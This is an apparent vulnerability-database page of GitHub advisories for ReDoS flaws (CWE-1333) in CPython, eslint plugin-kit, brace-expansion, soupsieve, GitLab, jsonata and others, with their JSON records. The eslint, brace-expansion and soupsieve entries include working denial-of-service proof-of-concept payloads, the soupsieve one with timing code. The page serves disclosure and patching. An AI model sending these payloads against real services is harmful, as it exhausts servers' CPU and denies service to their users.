Common Weakness Enumeration

CWE-1333

Allowed

Inefficient Regular Expression Complexity

Abstraction: Base · Status: Draft

The product uses a regular expression with a worst-case computational complexity that is inefficient and possibly exponential.

725 vulnerabilities reference this CWE, most recent first.

GHSA-7PWV-G7HJ-39PR

Vulnerability from github – Published: 2024-08-19 21:35 – Updated: 2025-11-04 00:31
VLAI
Details

There is a LOW severity vulnerability affecting CPython, specifically the 'http.cookies' standard library module.

When parsing cookies that contained backslashes for quoted characters in the cookie value, the parser would use an algorithm with quadratic complexity, resulting in excess CPU resources being used while parsing the value.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-7592"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-19T19:15:08Z",
    "severity": "HIGH"
  },
  "details": "There is a LOW severity vulnerability affecting CPython, specifically the\n\u0027http.cookies\u0027 standard library module.\n\n\nWhen parsing cookies that contained backslashes for quoted characters in\nthe cookie value, the parser would use an algorithm with quadratic\ncomplexity, resulting in excess CPU resources being used while parsing the\nvalue.",
  "id": "GHSA-7pwv-g7hj-39pr",
  "modified": "2025-11-04T00:31:17Z",
  "published": "2024-08-19T21:35:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7592"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/issues/123067"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/pull/123075"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/commit/391e5626e3ee5af267b97e37abc7475732e67621"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/commit/44e458357fca05ca0ae2658d62c8c595b048b5ef"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/commit/a77ab24427a18bff817025adb03ca920dc3f1a06"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/commit/b2f11ca7667e4d57c71c1c88b255115f16042d9a"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/commit/d4ac921a4b081f7f996a5d2b101684b67ba0ed7f"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/commit/d662e2db2605515a767f88ad48096b8ac623c774"
    },
    {
      "type": "WEB",
      "url": "https://github.com/python/cpython/commit/dcc3eaef98cd94d6cb6cb0f44bd1c903d04f33b1"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00000.html"
    },
    {
      "type": "WEB",
      "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/HXJAAAALNUNGCQUS2W7WR6GFIZIHFOOK"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20241018-0006"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7Q7G-4XM8-89CQ

Vulnerability from github – Published: 2024-11-15 20:47 – Updated: 2024-11-19 20:49
VLAI
Summary
Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit
Details

Crafting a very large and well crafted string can increase the CPU usage and crash the program.

POC

const { ConfigCommentParser } = require("@eslint/plugin-kit");

var str = "";
for (var i = 0; i < 1000000; i++) {
  str += " ";
}
str += "A";

console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseStringConfig(str, ""));
console.log("end")

// run `npm i @eslint/plugin-kit` and `node attack.js` 
// then the program will stuck forever with high CPU usage
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@eslint/plugin-kit"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-21539"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-15T20:47:31Z",
    "nvd_published_at": "2024-11-19T05:15:16Z",
    "severity": "LOW"
  },
  "details": "Crafting a very large and well crafted string can increase the CPU usage and crash the program.\n\n## POC\n\n```js\nconst { ConfigCommentParser } = require(\"@eslint/plugin-kit\");\n\nvar str = \"\";\nfor (var i = 0; i \u003c 1000000; i++) {\n  str += \" \";\n}\nstr += \"A\";\n\nconsole.log(\"start\")\nvar parser = new ConfigCommentParser();\nconsole.log(parser.parseStringConfig(str, \"\"));\nconsole.log(\"end\")\n\n// run `npm i @eslint/plugin-kit` and `node attack.js` \n// then the program will stuck forever with high CPU usage\n```",
  "id": "GHSA-7q7g-4xm8-89cq",
  "modified": "2024-11-19T20:49:57Z",
  "published": "2024-11-15T20:47:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/eslint/rewrite/security/advisories/GHSA-7q7g-4xm8-89cq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21539"
    },
    {
      "type": "WEB",
      "url": "https://github.com/eslint/rewrite/commit/071be842f0bd58de4863cdf2ab86d60f49912abf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/eslint/rewrite"
    },
    {
      "type": "WEB",
      "url": "https://security.snyk.io/vuln/SNYK-JS-ESLINTPLUGINKIT-8340627"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit"
}

GHSA-7QQ7-PVM9-X8RF

Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-20 19:31
VLAI
Summary
H2O Vulnerable to Denial of Service (DoS) via `/3/ParseSetup` Endpoint
Details

A vulnerability in the /3/ParseSetup endpoint of h2oai/h2o-3 version 3.46.0.1 allows for a denial of service (DoS) attack. The endpoint applies a user-specified regular expression to a user-controllable string. This can be exploited by an attacker to cause inefficient regular expression complexity, leading to the exhaustion of server resources and making the server unresponsive.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "h2o"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.30.0.7"
            },
            {
              "last_affected": "3.46.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ai.h2o:h2o-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.30.0.7"
            },
            {
              "last_affected": "3.46.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-10550"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-20T19:31:56Z",
    "nvd_published_at": "2025-03-20T10:15:17Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in the `/3/ParseSetup` endpoint of h2oai/h2o-3 version 3.46.0.1 allows for a denial of service (DoS) attack. The endpoint applies a user-specified regular expression to a user-controllable string. This can be exploited by an attacker to cause inefficient regular expression complexity, leading to the exhaustion of server resources and making the server unresponsive.",
  "id": "GHSA-7qq7-pvm9-x8rf",
  "modified": "2025-03-20T19:31:56Z",
  "published": "2025-03-20T12:32:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10550"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/h2oai/h2o-3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/h2oai/h2o-3/blob/51c25940ded8b7d0acc8f3f72329fd9dedbb3a34/h2o-core/src/main/java/water/api/ParseSetupHandler.java#L121"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/ef3f4d89-3b8b-4618-b134-cb93c1664ec6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "H2O Vulnerable to Denial of Service (DoS) via `/3/ParseSetup` Endpoint"
}

GHSA-7W3M-2PW9-MG8X

Vulnerability from github – Published: 2026-06-03 21:30 – Updated: 2026-06-04 21:31
VLAI
Details

Version 3.0.7 of the Securly Chrome Extension downloads config.json over HTTP and compiles server-provided patterns as JavaScript regular expressions via new RegExp() without complexity validation. An on-path attacker can inject specific patterns to cause catastrophic backtracking, resulting in denial of service on all browsing.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-8888"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-917"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-03T19:16:39Z",
    "severity": "HIGH"
  },
  "details": "Version 3.0.7 of the Securly Chrome Extension downloads config.json over HTTP and compiles server-provided patterns as JavaScript regular expressions via new RegExp() without complexity validation. An on-path attacker can inject specific patterns to cause catastrophic backtracking, resulting in denial of service on all browsing.",
  "id": "GHSA-7w3m-2pw9-mg8x",
  "modified": "2026-06-04T21:31:20Z",
  "published": "2026-06-03T21:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8888"
    },
    {
      "type": "WEB",
      "url": "https://kb.cert.org/vuls/id/595768"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-832H-XG76-4GV6

Vulnerability from github – Published: 2018-01-29 15:50 – Updated: 2021-09-03 22:10
VLAI
Summary
ReDoS in brace-expansion
Details

Affected versions of brace-expansion are vulnerable to a regular expression denial of service condition.

Proof of Concept

var expand = require('brace-expansion');
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');

Recommendation

Update to version 1.1.7 or later.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "brace-expansion"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.1.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2017-18077"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:24:01Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "Affected versions of `brace-expansion` are vulnerable to a regular expression denial of service condition.\n\n## Proof of Concept\n\n```\nvar expand = require(\u0027brace-expansion\u0027);\nexpand(\u0027{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\\n}\u0027);\n```\n\n\n## Recommendation\n\nUpdate to version 1.1.7 or later.",
  "id": "GHSA-832h-xg76-4gv6",
  "modified": "2021-09-03T22:10:24Z",
  "published": "2018-01-29T15:50:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-18077"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juliangruber/brace-expansion/issues/33"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juliangruber/brace-expansion/pull/35"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juliangruber/brace-expansion/pull/35/commits/b13381281cead487cbdbfd6a69fb097ea5e456c3"
    },
    {
      "type": "WEB",
      "url": "https://bugs.debian.org/862712"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-832h-xg76-4gv6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/juliangruber/brace-expansion"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/338"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ReDoS in brace-expansion"
}

GHSA-836R-79RF-4M37

Vulnerability from github – Published: 2026-07-09 13:37 – Updated: 2026-07-09 13:37
VLAI
Summary
Soup Sieve: Regular Expression Denial of Service (ReDoS) via Selector Parser
Details

Summary

The CSS selector parser in soupsieve (the CSS selector engine for Beautiful Soup 4) contains a regular expression vulnerable to catastrophic backtracking. When processing an attribute selector with an unterminated quoted value, the VALUE regex pattern in css_parser.py enters exponential backtracking. A payload of only 300 bytes causes the regex engine to hang for over 3 seconds, enabling a trivial Regular Expression Denial of Service (ReDoS) attack.

To be completely transparent, AI tools helped surface this issue. However, this was independently reproduced and carefully validated.

Any application that passes untrusted CSS selector strings to soupsieve.compile() or Beautiful Soup's .select() / .select_one() is affected.

Details

Affected code: soupsieve/css_parser.py, line ~121 - RE_VALUES / VALUE regex pattern

The soupsieve CSS parser uses a compiled regular expression to tokenise attribute selector values. This pattern matches both quoted strings ("value" or 'value') and unquoted identifiers. The regex contains alternation branches for:

  1. Double-quoted strings: "[^"\\]*(?:\\.[^"\\]*)*"
  2. Single-quoted strings: '[^'\\]*(?:\\.[^'\\]*)*'
  3. Unquoted identifiers

When an attribute selector contains an unterminated quoted value - e.g., [a="xxxx... (opening " but no closing ") -” the regex engine attempts to match the quoted-string branch. After that branch fails (no closing quote), the engine backtracks and attempts to match the remaining input against subsequent alternation branches and parent patterns. The structure of the pattern causes catastrophic backtracking where the number of backtracking steps grows exponentially with the length of the content between the opening quote and the end of the string.

Root cause: The regex pattern does not anchor or guard against the case where a quoted string is never terminated. The overlapping character classes across alternation branches create exponential backtracking when the quoted-string branch fails on long input.

Key characteristics: - Input size: Only 300 bytes are needed to trigger a >3 second hang - Amplification: Each additional character approximately doubles the backtracking time - No memory impact: The attack consumes CPU only (regex backtracking is compute-bound)

Proof of Concept

import time
import soupsieve as sv

PAYLOAD_LEN = 300

# Control: well-formed selector with terminated quote (completes instantly)
well_formed = '[a="' + ('x' * PAYLOAD_LEN) + '"]'
start = time.perf_counter()
try:
    sv.compile(well_formed)
except Exception:
    pass
control_time = time.perf_counter() - start
print(f"Well-formed selector ({len(well_formed)} bytes): {control_time:.4f}s")

# Exploit: unterminated quote triggers catastrophic regex backtracking
malformed = '[a="' + ('x' * PAYLOAD_LEN)
start = time.perf_counter()
try:
    sv.compile(malformed)  # WARNING: This will hang for >3 seconds
except Exception:
    pass
exploit_time = time.perf_counter() - start
print(f"Malformed selector ({len(malformed)} bytes): {exploit_time:.4f}s")

slowdown = exploit_time / max(control_time, 1e-9)
print(f"Slowdown: {slowdown:.0f}x")

# Expected output:
# Well-formed selector (306 bytes): ~0.001s
# Malformed selector (304 bytes): >3.0s (may need to be killed)
# Slowdown: >3000x
#
# NOTE: On some systems the malformed selector may hang indefinitely.
# Use a timeout mechanism (signal.alarm, threading.Timer) when testing.

Safe testing variant with timeout:

import signal
import soupsieve as sv

def timeout_handler(signum, frame):
    raise TimeoutError("ReDoS confirmed: regex backtracking exceeded timeout")

PAYLOAD_LEN = 300
malformed = '[a="' + ('x' * PAYLOAD_LEN)

signal.signal(signal.SIGALRM, timeout_handler)
signal.alarm(3)  # 3-second timeout

try:
    sv.compile(malformed)
    print("Selector compiled (not vulnerable)")
except TimeoutError as e:
    print(f"VULNERABLE: {e}")
except Exception as e:
    print(f"Other error: {e}")
finally:
    signal.alarm(0)  # Cancel the alarm

Impact

Severity: High

An attacker can cause CPU exhaustion on any server-side Python application that compiles user-supplied CSS selectors via soupsieve. The attack is particularly dangerous because:

  1. Tiny payload: Only 300 bytes are needed - well within typical URL parameter, form field, or API request limits
  2. No special characters: The payload consists entirely of printable ASCII characters ([a="xxx...)
  3. Exponential scaling: Each additional byte approximately doubles the backtracking time, making the attack easily tuneable
  4. Thread blocking: The regex engine blocks the calling thread with no opportunity for interruption (except via OS signals)
Parameter Value
Input size 300 bytes
CPU time consumed >3 seconds (exponential with payload length)
Memory consumed Negligible (CPU-only attack)
Authentication required None
User interaction required None

Deployment impact: In threaded or async web applications, a single malicious request blocks a worker thread for the duration of the backtracking. An attacker can submit multiple concurrent requests to exhaust all available workers, causing complete service denial. The small payload size makes the attack easy to deliver and difficult to detect via request size limits.

Downstream exposure: soupsieve is an automatic dependency of beautifulsoup4, one of the most widely installed Python packages. Any web application, API, or service that accepts CSS selectors from users is potentially affected.


Credit

The vulnerability was discovered by a security research team from the University of Sydney, whose focus is detecting open source software vulnerabilities. Liyi Zhou: https://lzhou1110.github.io/ Ziyue Wang: https://zyy0530.github.io/ Strick: https://str1ckl4nd.github.io/ Maurice: https://maurice.busystar.org/ Chenchen Yu: https://7thparkk.github.io/

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.8.3"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "soupsieve"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.8.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-49477"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-09T13:37:46Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe CSS selector parser in soupsieve (the CSS selector engine for Beautiful Soup 4) contains a regular expression vulnerable to catastrophic backtracking. When processing an attribute selector with an unterminated quoted value, the `VALUE` regex pattern in `css_parser.py` enters exponential backtracking. A payload of only **300 bytes** causes the regex engine to hang for **over 3 seconds**, enabling a trivial Regular Expression Denial of Service (ReDoS) attack.\n\nTo be completely transparent, AI tools helped surface this issue. However, this was independently reproduced and carefully validated.\n\nAny application that passes untrusted CSS selector strings to `soupsieve.compile()` or Beautiful Soup\u0027s `.select()` / `.select_one()` is affected.\n\n### Details\n\n**Affected code:** `soupsieve/css_parser.py`, line ~121 - `RE_VALUES` / `VALUE` regex pattern\n\nThe soupsieve CSS parser uses a compiled regular expression to tokenise attribute selector values. This pattern matches both quoted strings (`\"value\"` or `\u0027value\u0027`) and unquoted identifiers. The regex contains alternation branches for:\n\n1. Double-quoted strings: `\"[^\"\\\\]*(?:\\\\.[^\"\\\\]*)*\"`\n2. Single-quoted strings: `\u0027[^\u0027\\\\]*(?:\\\\.[^\u0027\\\\]*)*\u0027`\n3. Unquoted identifiers\n\nWhen an attribute selector contains an **unterminated quoted value** - e.g., `[a=\"xxxx...` (opening `\"` but no closing `\"`) -\u201d the regex engine attempts to match the quoted-string branch. After that branch fails (no closing quote), the engine backtracks and attempts to match the remaining input against subsequent alternation branches and parent patterns. The structure of the pattern causes **catastrophic backtracking** where the number of backtracking steps grows exponentially with the length of the content between the opening quote and the end of the string.\n\n**Root cause:** The regex pattern does not anchor or guard against the case where a quoted string is never terminated. The overlapping character classes across alternation branches create exponential backtracking when the quoted-string branch fails on long input.\n\n**Key characteristics:**\n- **Input size:** Only 300 bytes are needed to trigger a \u003e3 second hang\n- **Amplification:** Each additional character approximately doubles the backtracking time\n- **No memory impact:** The attack consumes CPU only (regex backtracking is compute-bound)\n\n### Proof of Concept\n\n```python\nimport time\nimport soupsieve as sv\n\nPAYLOAD_LEN = 300\n\n# Control: well-formed selector with terminated quote (completes instantly)\nwell_formed = \u0027[a=\"\u0027 + (\u0027x\u0027 * PAYLOAD_LEN) + \u0027\"]\u0027\nstart = time.perf_counter()\ntry:\n    sv.compile(well_formed)\nexcept Exception:\n    pass\ncontrol_time = time.perf_counter() - start\nprint(f\"Well-formed selector ({len(well_formed)} bytes): {control_time:.4f}s\")\n\n# Exploit: unterminated quote triggers catastrophic regex backtracking\nmalformed = \u0027[a=\"\u0027 + (\u0027x\u0027 * PAYLOAD_LEN)\nstart = time.perf_counter()\ntry:\n    sv.compile(malformed)  # WARNING: This will hang for \u003e3 seconds\nexcept Exception:\n    pass\nexploit_time = time.perf_counter() - start\nprint(f\"Malformed selector ({len(malformed)} bytes): {exploit_time:.4f}s\")\n\nslowdown = exploit_time / max(control_time, 1e-9)\nprint(f\"Slowdown: {slowdown:.0f}x\")\n\n# Expected output:\n# Well-formed selector (306 bytes): ~0.001s\n# Malformed selector (304 bytes): \u003e3.0s (may need to be killed)\n# Slowdown: \u003e3000x\n#\n# NOTE: On some systems the malformed selector may hang indefinitely.\n# Use a timeout mechanism (signal.alarm, threading.Timer) when testing.\n```\n\n**Safe testing variant with timeout:**\n\n```python\nimport signal\nimport soupsieve as sv\n\ndef timeout_handler(signum, frame):\n    raise TimeoutError(\"ReDoS confirmed: regex backtracking exceeded timeout\")\n\nPAYLOAD_LEN = 300\nmalformed = \u0027[a=\"\u0027 + (\u0027x\u0027 * PAYLOAD_LEN)\n\nsignal.signal(signal.SIGALRM, timeout_handler)\nsignal.alarm(3)  # 3-second timeout\n\ntry:\n    sv.compile(malformed)\n    print(\"Selector compiled (not vulnerable)\")\nexcept TimeoutError as e:\n    print(f\"VULNERABLE: {e}\")\nexcept Exception as e:\n    print(f\"Other error: {e}\")\nfinally:\n    signal.alarm(0)  # Cancel the alarm\n```\n\n### Impact\n\n**Severity: High**\n\nAn attacker can cause CPU exhaustion on any server-side Python application that compiles user-supplied CSS selectors via soupsieve. The attack is particularly dangerous because:\n\n1. **Tiny payload:** Only 300 bytes are needed - well within typical URL parameter, form field, or API request limits\n2. **No special characters:** The payload consists entirely of printable ASCII characters (`[a=\"xxx...`)\n3. **Exponential scaling:** Each additional byte approximately doubles the backtracking time, making the attack easily tuneable\n4. **Thread blocking:** The regex engine blocks the calling thread with no opportunity for interruption (except via OS signals)\n\n| Parameter | Value |\n|---|---|\n| Input size | 300 bytes |\n| CPU time consumed | \u003e3 seconds (exponential with payload length) |\n| Memory consumed | Negligible (CPU-only attack) |\n| Authentication required | None |\n| User interaction required | None |\n\n**Deployment impact:** In threaded or async web applications, a single malicious request blocks a worker thread for the duration of the backtracking. An attacker can submit multiple concurrent requests to exhaust all available workers, causing complete service denial. The small payload size makes the attack easy to deliver and difficult to detect via request size limits.\n\n**Downstream exposure:** soupsieve is an automatic dependency of `beautifulsoup4`, one of the most widely installed Python packages. Any web application, API, or service that accepts CSS selectors from users is potentially affected.\n\n---\n\n### Credit\n\nThe vulnerability was discovered by a security research team from the University of Sydney, whose focus is detecting open source software vulnerabilities.\nLiyi Zhou: https://lzhou1110.github.io/\nZiyue Wang: https://zyy0530.github.io/\nStrick: https://str1ckl4nd.github.io/\nMaurice: https://maurice.busystar.org/\nChenchen Yu: https://7thparkk.github.io/",
  "id": "GHSA-836r-79rf-4m37",
  "modified": "2026-07-09T13:37:46Z",
  "published": "2026-07-09T13:37:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/facelessuser/soupsieve/security/advisories/GHSA-836r-79rf-4m37"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/facelessuser/soupsieve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Soup Sieve: Regular Expression Denial of Service (ReDoS) via Selector Parser"
}

GHSA-8372-VR6C-F48R

Vulnerability from github – Published: 2024-06-13 00:31 – Updated: 2024-06-13 00:31
VLAI
Details

An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.1 prior to 16.10.7, starting from 16.11 prior to 16.11.4, and starting from 17.0 prior to 17.0.2. It was possible for an attacker to cause a denial of service using maliciously crafted file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-1495"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-12T23:15:49Z",
    "severity": "MODERATE"
  },
  "details": "An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.1 prior to 16.10.7, starting from 16.11 prior to 16.11.4, and starting from 17.0 prior to 17.0.2. It was possible for an attacker to cause a denial of service using maliciously crafted file.",
  "id": "GHSA-8372-vr6c-f48r",
  "modified": "2024-06-13T00:31:23Z",
  "published": "2024-06-13T00:31:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1495"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/2359528"
    },
    {
      "type": "WEB",
      "url": "https://about.gitlab.com/releases/2024/06/12/patch-release-gitlab-17-0-2-released/#redos-in-gomod-dependency-linker"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/441807"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-85VJ-FFXC-X8W8

Vulnerability from github – Published: 2023-06-28 21:30 – Updated: 2024-04-04 05:16
VLAI
Details

An issue has been discovered in GitLab affecting all versions starting from 15.10 before 16.1, leading to a ReDoS vulnerability in the Jira prefix

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-2232"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-28T21:15:09Z",
    "severity": "MODERATE"
  },
  "details": "An issue has been discovered in GitLab affecting all versions starting from 15.10 before 16.1, leading to a ReDoS vulnerability in the Jira prefix",
  "id": "GHSA-85vj-ffxc-x8w8",
  "modified": "2024-04-04T05:16:18Z",
  "published": "2023-06-28T21:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2232"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/1934802"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2232.json"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/408352"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-86VW-MFPG-WWV9

Vulnerability from github – Published: 2026-07-02 20:13 – Updated: 2026-07-02 20:13
VLAI
Summary
jsonata: Malicious inputs to "$toMillis" function can cause resource exhaustion
Details

Impact

In JSONata <v2.2.0, it is possible to craft non-matching inputs to the $toMillis function that cause superlinear backtracking in the ISO-8601 validation regex. This may lead to denial of service in applications that evaluate user-provided JSONata expressions.

Patches

This issue has been addressed in JSONata version >= 2.2.0 via fixes that include https://github.com/jsonata-js/jsonata/pull/782 and https://github.com/jsonata-js/jsonata/pull/793. Applications that evaluate user-provided expressions should update ASAP to prevent exploitation.

References

https://github.com/jsonata-js/jsonata/releases/tag/v2.2.0

Credit

Thank you to Doruk Tan Öztürk for disclosing this issue.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "jsonata"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-52746"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-02T20:13:55Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Impact\nIn JSONata `\u003cv2.2.0`, it is possible to craft non-matching inputs to the [$toMillis](https://docs.jsonata.org/date-time-functions#tomillis) function that cause superlinear backtracking in the ISO-8601 validation regex. This may lead to denial of service in applications that evaluate user-provided JSONata expressions.\n\n### Patches\nThis issue has been addressed in JSONata version \u003e= 2.2.0 via fixes that include https://github.com/jsonata-js/jsonata/pull/782 and https://github.com/jsonata-js/jsonata/pull/793. Applications that evaluate user-provided expressions should update ASAP to prevent exploitation.\n\n### References\nhttps://github.com/jsonata-js/jsonata/releases/tag/v2.2.0\n\n### Credit\nThank you to Doruk Tan \u00d6zt\u00fcrk for disclosing this issue.",
  "id": "GHSA-86vw-mfpg-wwv9",
  "modified": "2026-07-02T20:13:55Z",
  "published": "2026-07-02T20:13:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/jsonata-js/jsonata/security/advisories/GHSA-86vw-mfpg-wwv9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jsonata-js/jsonata/pull/782"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jsonata-js/jsonata/pull/793"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jsonata-js/jsonata/commit/80ba95d170f74e3f20f4f36b8b77d8c85cea7686"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jsonata-js/jsonata/commit/d6ffc17cb16a8e53c222205bd274624e919cce0b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jsonata-js/jsonata"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jsonata-js/jsonata/releases/tag/v2.2.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
